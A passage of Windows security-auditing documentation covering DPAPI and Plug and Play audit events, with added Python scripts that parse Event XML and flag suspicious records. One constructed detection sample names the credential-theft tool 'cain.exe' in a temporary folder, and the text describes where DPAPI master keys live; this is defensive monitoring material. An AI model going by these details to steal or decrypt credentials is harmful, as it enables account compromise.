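        if not proc.startswith(STANDARD_FOLDERS):
            findings.append(f"4798: Process Name outside standard folders: {proc}")
        if any(folder in proc for folder in RESTRICTED_FOLDERS):
            findings.append(f"4798: Process Name in a restricted folder: {proc}")
        if any(word in proc for word in RESTRICTED_SUBSTRINGS):
            findings.append(f"4798: restricted substring in Process Name: {proc}")
    elif event_id in (5376, 5377):
        # Record every occurrence: backup/restore of Credential Manager is rarely done by users.
        action = "backed up" if event_id == 5376 else "restored from a backup"
        findings.append(f"{event_id}: Credential Manager credentials {action} by {subject} "
                        f"(Logon ID {d.get('SubjectLogonId')})")
    return findings


def make_event(event_id, computer, **data):
    """Constructed helper: render a record in the page's Event XML shape (other System fields omitted)."""
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID>'
            f'<Computer>{computer}</Computer></System><EventData>{fields}</EventData></Event>')


_4798_BASE = dict(TargetUserName="Administrator", TargetDomainName="WIN10-1",
                  TargetSid="S-1-5-21-1694160624-234216347-2203645164-500",
                  SubjectUserSid="S-1-5-21-1377283216-344919071-3415362939-1104",
                  SubjectUserName="dadmin", SubjectDomainName="CONTOSO", SubjectLogonId="0x72d9d")
# The page's 4798 record (mmc.exe from System32) ...
SAMPLE_4798_BENIGN = make_event(4798, "WIN10-1.contoso.local", CallerProcessId="0xc80",
                                CallerProcessName=r"C:\\Windows\\System32\\mmc.exe", **_4798_BASE)
# ... and a constructed 4798 record whose process runs from a restricted folder.
SAMPLE_4798_SUSPECT = make_event(
    4798, "WIN10-1.contoso.local", CallerProcessId="0x1a4",
    CallerProcessName=r"C:\Users\dadmin\AppData\Local\Microsoft\Windows\Temporary Internet Files\cain.exe",
    **_4798_BASE)
SAMPLE_4781 = make_event(
    4781, "DC01.contoso.local", OldTargetUserName="Admin", NewTargetUserName="MainAdmin",
    TargetDomainName="CONTOSO", TargetSid="S-1-5-21-3457937927-2839227994-823803824-6117",
    SubjectUserSid="S-1-5-21-3457937927-2839227994-823803824-1104", SubjectUserName="dadmin",
    SubjectDomainName="CONTOSO", SubjectLogonId="0x30d5f", PrivilegeList="-")
SAMPLE_4794 = make_event(
    4794, "DC01.contoso.local", SubjectUserSid="S-1-5-21-3457937927-2839227994-823803824-1104",
    SubjectUserName="dadmin", SubjectDomainName="CONTOSO", SubjectLogonId="0x36f67",
    Workstation="DC01", Status="0x0")
SAMPLE_5376 = make_event(
    5376, "DC01.contoso.local", SubjectUserSid="S-1-5-21-3457937927-2839227994-823803824-1104",
    SubjectUserName="dadmin", SubjectDomainName="CONTOSO", SubjectLogonId="0x30d7c")

if __name__ == "__main__":
    for record in (SAMPLE_4798_BENIGN, SAMPLE_4798_SUSPECT, SAMPLE_4781, SAMPLE_4794, SAMPLE_5376):
        print(evaluate(record) or "no finding")
```

The benign 4798 record produces no finding; the constructed one trips four of the five 4798 rules, and the 4781, 4794 and 5376 records each produce exactly one finding.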
Audit DPAPI Activity
4/5/2019

Applies to
Windows 10
Windows Server 2016
Audit DPAPI Activity determines whether the operating system generates audit events when encryption or
decryption calls are made into the data protection application interface (DPAPI).
Event volume: Low.

COMPUTER TYPE | GENERAL SUCCESS | GENERAL FAILURE | STRONGER SUCCESS | STRONGER FAILURE | COMMENTS
Domain Controller | IF | IF | IF | IF | Events in this subcategory typically have an informational purpose and it is difficult to detect any malicious activity using these events. It’s mainly used for DPAPI troubleshooting.
Member Server | IF | IF | IF | IF | Events in this subcategory typically have an informational purpose and it is difficult to detect any malicious activity using these events. It’s mainly used for DPAPI troubleshooting.
Workstation | IF | IF | IF | IF | Events in this subcategory typically have an informational purpose and it is difficult to detect any malicious activity using these events. It’s mainly used for DPAPI troubleshooting.

Events List:
4692(S, F): Backup of data protection master key was attempted.
4693(S, F): Recovery of data protection master key was attempted.
4694(S, F): Protection of auditable protected data was attempted.
4695(S, F): Unprotection of auditable protected data was attempted.
4692(S, F): Backup of data protection master key was attempted.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit DPAPI Activity
Event Description:
This event generates every time that a backup is attempted for the DPAPI Master Key.
When a computer is a member of a domain, DPAPI has a backup mechanism to allow unprotection of the data. When a
Master Key is generated, DPAPI communicates with a domain controller. Domain controllers have a domain-wide
public/private key pair, associated solely with DPAPI. The local DPAPI client gets the domain controller public key
from a domain controller by using a mutually authenticated and privacy protected RPC call. The client encrypts the
Master Key with the domain controller public key. It then stores this backup Master Key along with the Master Key
protected by the user's password.
Periodically, a domain-joined machine will try to send an RPC request to a domain controller to back up the user’s
master key so that the user can recover secrets in case his or her password has to be reset. Although the user's keys
are stored in the user profile, a domain controller must be contacted to encrypt the master key with a domain
recovery key.
This event also generates, for example, every time a new DPAPI Master Key is generated.
This event generates on domain controllers, member servers, and workstations.
A Failure event generates when a Master Key backup operation fails for some reason.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4692</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13314</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-08-25T01:59:14.573672700Z" />
<EventRecordID>176964</EventRecordID>
<Correlation />
<Execution ProcessID="520" ThreadID="540" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-500</Data>
<Data Name="SubjectUserName">ladmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x30c08</Data>
<Data Name="MasterKeyId">16cfaea0-dbe3-4d92-9523-d494edb546bc</Data>
<Data Name="RecoveryServer" />
<Data Name="RecoveryKeyId">806a0350-aeb1-4c56-91f9-ef16cf759291</Data>
<Data Name="FailureReason">0x0</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the backup operation. Event Viewer automatically tries to
resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the
event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested backup operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Key Information:
Key Identifier [Type = UnicodeString]: unique identifier of the master key whose backup was created. The
Master Key is used, with some additional data, to generate an actual symmetric session key to
encrypt\decrypt the data using DPAPI. All of a user's Master Keys are located in the user profile ->
%APPDATA%\Roaming\Microsoft\Windows\Protect\%SID% folder. The name of every Master Key file is its
ID.
Recovery Server [Type = UnicodeString]: the name (typically the DNS name) of the computer that you
contacted to back up your Master Key. For domain joined machines, it’s typically the name of a domain
controller. This parameter might not be captured in the event, and in that case will be empty.
Recovery Key ID [Type = UnicodeString]: unique identifier of a recovery key. The recovery key is
generated when a user chooses to create a Password Reset Disk (PRD) from the user's Control Panel or
when the first Master Key is generated. First, DPAPI generates an RSA public/private key pair, which is the
recovery key. In this field you will see the unique Recovery Key ID that was used for the Master Key backup
operation.
For Failure events this field is typically empty.
Status Information:
Status Code [Type = HexInt32]: hexadecimal unique status code of the performed operation. For Success events
this field is typically “0x0”. To see the meaning of a status code, convert it to a decimal value and use the
“net helpmsg STATUS_CODE” command to see the description for that specific STATUS_CODE. Here is an
example of “net helpmsg” command output for status code 0x3A:

[Net helpmsg 58 illustration](..images/net-helpmsg-58.png)

Security Monitoring Recommendations


For 4692(S, F): Backup of data protection master key was attempted.
This event is typically an informational event and it is difficult to detect any malicious activity using this event.
It’s mainly used for DPAPI troubleshooting.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.
4693(S, F): Recovery of data protection master key was attempted.
4/5/2019 • 4 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit DPAPI Activity
Event Description:
This event generates every time that recovery is attempted for a DPAPI Master Key.
While unprotecting data, if DPAPI cannot use the Master Key protected by the user's password, it sends the backup Master Key to a domain controller by using a mutually authenticated and privacy protected RPC call. The domain controller then decrypts the Master Key with its private key and sends it back to the client by using the same protected RPC call. This protected RPC call is used to ensure that no one listening on the network can get the Master Key.
This event generates on domain controllers, member servers, and workstations.
Failure event generates when a Master Key restore operation fails for some reason.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4693</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>13314</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-08-22T06:25:14.589407700Z" />
    <EventRecordID>175809</EventRecordID>
    <Correlation />
    <Execution ProcessID="520" ThreadID="1340" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x30d7c</Data>
    <Data Name="MasterKeyId">0445c766-75f0-4de7-82ad-d9d97aad59f6</Data>
    <Data Name="RecoveryReason">0x5c005c</Data>
    <Data Name="RecoveryServer">DC01.contoso.local</Data>
    <Data Name="RecoveryKeyId" />
    <Data Name="FailureId">0x380000</Data>
  </EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “recover” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “recover” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Key Information:
Key Identifier [Type = UnicodeString]: unique identifier of the master key that was recovered. The Master Key is used, with some additional data, to generate the actual symmetric session key that encrypts or decrypts the data using DPAPI. All of a user's Master Keys are located in the user profile, in the %APPDATA%\Roaming\Microsoft\Windows\Protect\%SID% folder. The name of every Master Key file is its ID.
Recovery Server [Type = UnicodeString]: the name (typically the DNS name) of the computer that you contacted to recover your Master Key. For domain-joined machines, it’s typically the name of a domain controller.

Note In this event the Recovery Server field contains information from the Recovery Reason field.

Recovery Key ID [Type = UnicodeString]: unique identifier of a recovery key. The recovery key is generated when a user chooses to create a Password Reset Disk (PRD) from the user's Control Panel or when the first Master Key is generated. First, DPAPI generates an RSA public/private key pair, which is the recovery key. In this field you will see the unique Recovery Key ID that was used for the Master Key recovery operation. This parameter might not be captured in the event, and in that case will be empty.
Recovery Reason [Type = HexInt32]: hexadecimal code of the recovery reason.

Note In this event the Recovery Reason field contains information from the Recovery Server field.

Status Information:
Status Code [Type = HexInt32]: hexadecimal unique status code. For Success events this field is typically “0x380000”.

Security Monitoring Recommendations


For 4693(S, F): Recovery of data protection master key was attempted.
This event is typically an informational event and it is difficult to detect any malicious activity using this
event. It’s mainly used for DPAPI troubleshooting.
For domain joined computers, Recovery Reason should typically be a domain controller DNS name.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.
4694(S, F): Protection of auditable protected data was attempted.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
This event generates if the DPAPI CryptProtectData() function was used with the CRYPTPROTECT_AUDIT flag (dwFlags) enabled.
There is no example of this event in this document.
Subcategory: Audit DPAPI Activity
Event Schema:
Protection of auditable protected data was attempted.
Subject:

Security ID:%1
Account Name:%2
Account Domain:%3
Logon ID:%4

Protected Data:

Data Description:%6
Key Identifier:%5
Protected Data Flags:%7
Protection Algorithms:%8

Status Information:

Status Code:%9

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.

Security Monitoring Recommendations


There is no recommendation for this event in this document.
This event is typically an informational event and it is difficult to detect any malicious activity using this
event. It’s mainly used for DPAPI troubleshooting.
4695(S, F): Unprotection of auditable protected data was attempted.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
This event generates if the DPAPI CryptUnprotectData() function was used to unprotect “auditable” data that was encrypted using the CryptProtectData() function with the CRYPTPROTECT_AUDIT flag (dwFlags) enabled.
There is no example of this event in this document.
Subcategory: Audit DPAPI Activity
Event Schema:
Unprotection of auditable protected data was attempted.
Subject:

Security ID:%1
Account Name:%2
Account Domain:%3
Logon ID:%4

Protected Data:

Data Description:%6
Key Identifier:%5
Protected Data Flags:%7
Protection Algorithms:%8

Status Information:

Status Code:%9

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.

Security Monitoring Recommendations


There is no recommendation for this event in this document.
This event is typically an informational event and it is difficult to detect any malicious activity using this
event. It’s mainly used for DPAPI troubleshooting.
Audit PNP Activity
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Audit PNP Activity determines when Plug and Play detects an external device.
A PnP audit event can be used to track down changes in system hardware and will be logged on the machine
where the change took place. For example, when a keyboard is plugged into a computer, a PnP event is triggered.
Event volume: Varies, depending on how the computer is used. Typically Low.

COMPUTER TYPE | GENERAL SUCCESS | GENERAL FAILURE | STRONGER SUCCESS | STRONGER FAILURE | COMMENTS
Domain Controller | Yes | No | Yes | No | This subcategory will help identify when and which Plug and Play device was attached, enabled, disabled or restricted by device installation policy. You can track, for example, whether a USB flash drive or stick was attached to a domain controller, which is typically not allowed. This subcategory doesn’t have Failure events, so there is no recommendation to enable Failure auditing for this subcategory.
Member Server | Yes | No | Yes | No | This subcategory will help identify when and which Plug and Play device was attached, enabled, disabled or restricted by device installation policy. You can track, for example, whether a USB flash drive or stick was attached to a critical server, which is typically not allowed. This subcategory doesn’t have Failure events, so there is no recommendation to enable Failure auditing for this subcategory.
Workstation | Yes | No | Yes | No | This subcategory will help identify when and which Plug and Play device was attached, enabled, disabled or restricted by device installation policy. You can track, for example, whether a USB flash drive or stick was attached to an administrative workstation or VIP workstation. This subcategory doesn’t have Failure events, so there is no recommendation to enable Failure auditing for this subcategory.
Events List:
6416(S): A new external device was recognized by the System.
6419(S): A request was made to disable a device.
6420(S): A device was disabled.
6421(S): A request was made to enable a device.
6422(S): A device was enabled.
6423(S): The installation of this device is forbidden by system policy.
6424(S): The installation of this device was allowed, after having previously been forbidden by policy.
6416(S): A new external device was recognized by the System.
4/5/2019 • 3 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit PNP Activity
Event Description:
This event generates every time a new external device is recognized by a system.
This event generates, for example, when a new external device is connected or enabled.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>6416</EventID>
    <Version>1</Version>
    <Level>0</Level>
    <Task>13316</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-11-13T18:20:16.818569900Z" />
    <EventRecordID>436</EventRecordID>
    <Correlation />
    <Execution ProcessID="4" ThreadID="308" />
    <Channel>Security</Channel>
    <Computer>DESKTOP-NFC0HVN</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-18</Data>
    <Data Name="SubjectUserName">DESKTOP-NFC0HVN$</Data>
    <Data Name="SubjectDomainName">WORKGROUP</Data>
    <Data Name="SubjectLogonId">0x3e7</Data>
    <Data Name="DeviceId">SCSI\Disk&Ven_Seagate&Prod_Expansion\000000</Data>
    <Data Name="DeviceDescription">Seagate Expansion SCSI Disk Device</Data>
    <Data Name="ClassId">{4D36E967-E325-11CE-BFC1-08002BE10318}</Data>
    <Data Name="ClassName">DiskDrive</Data>
    <Data Name="VendorIds">SCSI\DiskSeagate_Expansion_______0636 SCSI\DiskSeagate_Expansion_______ SCSI\DiskSeagate_ SCSI\Seagate_Expansion_______0 Seagate_Expansion_______0 GenDisk</Data>
    <Data Name="CompatibleIds">SCSI\Disk SCSI\RAW</Data>
    <Data Name="LocationInformation">Bus Number 0, Target Id 0, LUN 0</Data>
  </EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2016, Windows 10.
Event Versions:
0 - Windows 10.
1 - Windows 10 [Version 1511].
Added “Device ID” field.
Added “Device Name” field.
Added “Class Name” field.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that registered the new device. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that registered the new device.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Device ID [Type = UnicodeString] [Version 1]: “Device instance path” attribute of device. To see device properties, start Device Manager, open specific device properties, and click “Details”.
Device Name [Type = UnicodeString] [Version 1]: “Device description” attribute of device. To see device properties, start Device Manager, open specific device properties, and click “Details”.
Class ID [Type = UnicodeString]: “Class Guid” attribute of device. To see device properties, start Device Manager, open specific device properties, and click “Details”.
Class Name [Type = UnicodeString] [Version 1]: “Class” attribute of device. To see device properties, start Device Manager, open specific device properties, and click “Details”.
Vendor IDs [Type = UnicodeString]: “Hardware Ids” attribute of device. To see device properties, start Device Manager, open specific device properties, and click “Details”.
Compatible IDs [Type = UnicodeString]: “Compatible Ids” attribute of device. To see device properties, start Device Manager, open specific device properties, and click “Details”.
Location Information [Type = UnicodeString]: “Location information” attribute of device. To see device properties, start Device Manager, open specific device properties, and click “Details”.

Security Monitoring Recommendations


For 6416(S): A new external device was recognized by the System.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

Because this event is typically triggered by the SYSTEM account, we recommend that you report it
whenever “Subject\Security ID” is not SYSTEM.
You can use this event to track the events and event information shown in the following table by using the
listed fields:

EVENT AND EVENT INFORMATION TO MONITOR | FIELD TO USE
Device recognition events, Device Instance Path | “Device ID”
Device recognition events, Device Description | “Device Name”
Device recognition events, Class GUID | “Class ID”
Device recognition events, Hardware IDs | “Vendor IDs”
Device recognition events, Compatible IDs | “Compatible IDs”
Device recognition events, Location information | “Location Information”
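An added example (not Microsoft's code) that applies the 6416 recommendations above, and the Audit PNP Activity guidance about disk devices on domain controllers, critical servers and administrative workstations, to an Event XML record: it parses the record, reports any subject other than SYSTEM, and extracts the fields listed in the table. The sample record is constructed from the 6416 XML shown earlier; the set of sensitive hosts is an assumption made for the demonstration.

```python
"""Triage of Security event 6416 (a new external device was recognized).

Added example, not Microsoft's code. SAMPLE_6416 is constructed from the
6416 Event XML shown in this section; SENSITIVE_HOSTS is an assumed list.
"""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
SYSTEM_SID = "S-1-5-18"  # 6416 is normally raised by the SYSTEM account
# "Class Guid" of the DiskDrive setup class, as seen in the 6416 sample.
DISK_DRIVE_CLASS = "{4D36E967-E325-11CE-BFC1-08002BE10318}"
# Hosts on which attaching a disk device is typically not allowed
# (domain controllers, critical servers, admin workstations). Assumed list.
SENSITIVE_HOSTS = {"DC01.contoso.local", "DESKTOP-NFC0HVN"}

# Fields the monitoring table says to use, keyed by their Event XML Data Name.
MONITORED_FIELDS = {
    "DeviceId": "Device ID",
    "DeviceDescription": "Device Name",
    "ClassId": "Class ID",
    "ClassName": "Class Name",
    "VendorIds": "Vendor IDs",
    "CompatibleIds": "Compatible IDs",
    "LocationInformation": "Location Information",
}

# Constructed record. In the XML view of Event Viewer the '&' inside device
# paths is escaped as '&amp;'; the text above shows it unescaped.
SAMPLE_6416 = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>6416</EventID>
    <Version>1</Version>
    <Task>13316</Task>
    <Channel>Security</Channel>
    <Computer>DESKTOP-NFC0HVN</Computer>
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-18</Data>
    <Data Name="SubjectUserName">DESKTOP-NFC0HVN$</Data>
    <Data Name="SubjectDomainName">WORKGROUP</Data>
    <Data Name="SubjectLogonId">0x3e7</Data>
    <Data Name="DeviceId">SCSI\\Disk&amp;Ven_Seagate&amp;Prod_Expansion\\000000</Data>
    <Data Name="DeviceDescription">Seagate Expansion SCSI Disk Device</Data>
    <Data Name="ClassId">{4D36E967-E325-11CE-BFC1-08002BE10318}</Data>
    <Data Name="ClassName">DiskDrive</Data>
    <Data Name="VendorIds">SCSI\\DiskSeagate_Expansion_______0636 GenDisk</Data>
    <Data Name="CompatibleIds">SCSI\\Disk SCSI\\RAW</Data>
    <Data Name="LocationInformation">Bus Number 0, Target Id 0, LUN 0</Data>
  </EventData>
</Event>
"""
# Same record, but raised under a local user SID (the one from the 6419 sample).
SAMPLE_6416_USER_SUBJECT = SAMPLE_6416.replace(
    "S-1-5-18", "S-1-5-21-2695983153-1310895815-1903476278-1001")


def parse_event(xml_text):
    """Return (event_id, computer, {DataName: value}) for one Event XML record."""
    root = ET.fromstring(xml_text)
    system = root.find("e:System", NS)
    event_id = int(system.findtext("e:EventID", namespaces=NS))
    computer = system.findtext("e:Computer", namespaces=NS)
    data = {d.get("Name"): (d.text or "").strip()
            for d in root.findall("e:EventData/e:Data", NS)}
    return event_id, computer, data


def triage_6416(xml_text):
    """Apply the 6416 recommendations; return tracked fields and alert reasons."""
    event_id, computer, data = parse_event(xml_text)
    if event_id != 6416:
        raise ValueError(f"expected event 6416, got {event_id}")
    reasons = []
    subject_sid = data.get("SubjectUserSid", "")
    # Recommendation: report the event whenever Subject\Security ID is not SYSTEM.
    if subject_sid != SYSTEM_SID:
        reasons.append(f"subject is not SYSTEM: {subject_sid}")
    # Audit PNP Activity guidance: a disk device on a DC, critical server or
    # admin workstation is worth reporting even when SYSTEM raised the event.
    if data.get("ClassId", "").upper() == DISK_DRIVE_CLASS and computer in SENSITIVE_HOSTS:
        reasons.append(f"DiskDrive device attached to sensitive host {computer}")
    tracked = {label: data.get(name, "") for name, label in MONITORED_FIELDS.items()}
    return {"computer": computer, "subject_sid": subject_sid,
            "tracked": tracked, "reasons": reasons}


if __name__ == "__main__":
    for record in (SAMPLE_6416, SAMPLE_6416_USER_SUBJECT):
        result = triage_6416(record)
        print(result["computer"], result["subject_sid"], result["reasons"])
        for label, value in result["tracked"].items():
            print(f"  {label}: {value}")
```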


6419(S): A request was made to disable a device.
4/5/2019 • 3 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit PNP Activity
Event Description:
This event generates every time someone makes a request to disable a device.
This event doesn’t mean that the device was disabled.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>6419</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>13316</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-11-14T22:23:26.789591400Z" />
    <EventRecordID>483</EventRecordID>
    <Correlation />
    <Execution ProcessID="2192" ThreadID="1392" />
    <Channel>Security</Channel>
    <Computer>DESKTOP-NFC0HVN</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-21-2695983153-1310895815-1903476278-1001</Data>
    <Data Name="SubjectUserName">ladmin</Data>
    <Data Name="SubjectDomainName">DESKTOP-NFC0HVN</Data>
    <Data Name="SubjectLogonId">0x3fcc7</Data>
    <Data Name="DeviceId">USB\VID_138A&PID_0017\FFBC12C950A0</Data>
    <Data Name="DeviceDescription">Synaptics FP Sensors (WBF) (PID=0017)</Data>
    <Data Name="ClassId">{53D29EF7-377C-4D14-864B-EB3A85769359}</Data>
    <Data Name="ClassName">Biometric</Data>
    <Data Name="HardwareIds">USB\VID_138A&PID_0017&REV_0078 USB\VID_138A&PID_0017</Data>
    <Data Name="CompatibleIds">USB\Class_FF&SubClass_00&Prot_00 USB\Class_FF&SubClass_00 USB\Class_FF</Data>
    <Data Name="LocationInformation">Port_#0002.Hub_#0004</Data>
  </EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows 10 [Version 1511].
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that made the request. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that made the request.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Device ID [Type = UnicodeString]: “Device instance path” attribute of device. To see device properties, start Device Manager, open specific device properties, and click “Details”.
Device Name [Type = UnicodeString]: “Device description” attribute of device. To see device properties, start Device Manager, open specific device properties, and click “Details”.
Class ID [Type = UnicodeString]: “Class Guid” attribute of device. To see device properties, start Device Manager, open specific device properties, and click “Details”.
Class Name [Type = UnicodeString]: “Class” attribute of device. To see device properties, start Device Manager, open specific device properties, and click “Details”.
Hardware IDs [Type = UnicodeString]: “Hardware Ids” attribute of device. To see device properties, start Device Manager, open specific device properties, and click “Details”.
Compatible IDs [Type = UnicodeString]: “Compatible Ids” attribute of device. To see device properties, start Device Manager, open specific device properties, and click “Details”.
Location Information [Type = UnicodeString]: “Location information” attribute of device. To see device properties, start Device Manager, open specific device properties, and click “Details”.

Security Monitoring Recommendations


For 6419(S): A request was made to disable a device.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

You can use this event to track the events and event information shown in the following table by using the listed
fields:

EVENT AND EVENT INFORMATION TO MONITOR | FIELD TO USE
Device disable requests, Device Instance Path | “Device ID”
Device disable requests, Device Description | “Device Name”
Device disable requests, Class GUID | “Class ID”
Device disable requests, Hardware IDs | “Hardware IDs”
Device disable requests, Compatible IDs | “Compatible IDs”
Device disable requests, Location information | “Location Information”


6420(S): A device was disabled.
4/5/2019 • 3 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit PNP Activity
Event Description:
This event generates every time a specific device was disabled.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
